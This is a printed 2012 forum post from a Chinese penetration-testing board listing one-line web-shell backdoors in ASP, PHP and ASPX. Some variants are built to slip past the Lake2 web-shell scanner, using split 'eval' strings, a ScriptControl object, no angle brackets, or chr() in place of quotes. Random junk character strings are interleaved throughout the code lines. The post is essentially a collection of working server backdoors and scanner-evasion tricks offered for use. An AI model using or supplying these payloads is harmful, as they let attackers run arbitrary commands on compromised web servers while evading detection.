中国网络渗透测试联盟

标题: 过雷克图一句话木马 [打印本页]
作者: admin    时间: 2012-9-23 14:36
标题: 过雷克图一句话木马
asp一句话  <%execute(request("1"))%>  
& m5 n& Z8 G/ M1 I3 t  U# R1 r
1 e0 w2 T5 z  ]/ t* O$ Bphp一句话  <?php eval($_POST[1]);?>  ) U) E. a' K; l, b) z' M

+ `8 q. J6 q% P' k8 Naspx一句话* a$ z) t3 z2 c

9 g$ z, V. m2 l$ U4 E5 q<script language="C#" runat="server">! Q; @7 y# m6 z! t; e8 M1 o; j
6 s5 ~& }6 ?/ C* ]; K
WebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");! h) [4 V! i5 U! R* n/ S4 C/ C

) C1 u* x* n& F! c4 O</script>5 P+ r! ~% |( p! ~
. W3 Z7 Q; U- D+ z  n6 D' j
可以躲过雷客图的一句话。+ e2 D2 X5 n7 p2 P1 m+ j9 Q, D
( o( R/ {: H/ ]/ |: m% c
  <%) R8 U) L5 {2 ^5 u# [

6 B6 `- t9 r# F% c  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
8 i: J# X6 w9 C/ O& y
2 `$ e, R: I7 T: C& J% I) ^  ms.Language="VBScript"  Z7 n; n- S5 {' c* h* Q

/ Y  T  ~. j; L0 e6 J4 i7 @  ms.AddObject "Response", Response' P$ K- ]1 `2 D7 e  g2 a

# g5 K+ |& R* ^( S1 n; c- X3 _  ms.AddObject "request", request, ~$ H$ H; L# L4 Y2 m/ X7 c5 x$ s+ r' f
( W# q1 I/ }6 \9 I: O6 X
  ms.ExecuteStatement("ev"&"al(request(""1""))")
, |4 f) w4 A# n* h* U5 S& y
1 W6 A! V) G1 A) j9 _9 A3 S  %>
! j% v# _+ d/ i4 ?7 o* t) u; Z. p: g/ A4 g
  不用'<,>'的asp一句话
/ R) b8 j' r0 Z" m* {3 r5 O
- c4 G3 Q' h4 R0 {# L& b  <script language=VBScript runat=server>execute request("1")</script>
" {7 u+ @7 ?3 d: H/ _8 H
* b3 ^# K/ K1 Y) Z( J9 t2 C. a, F  不用双引号的一句话。6 ~% s$ E! @5 @* M, J
6 p7 b8 ?9 s6 i  E: p/ w
  <%eval request(chr(35))%>
3 g" n* X  x0 ^1 U3 H



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2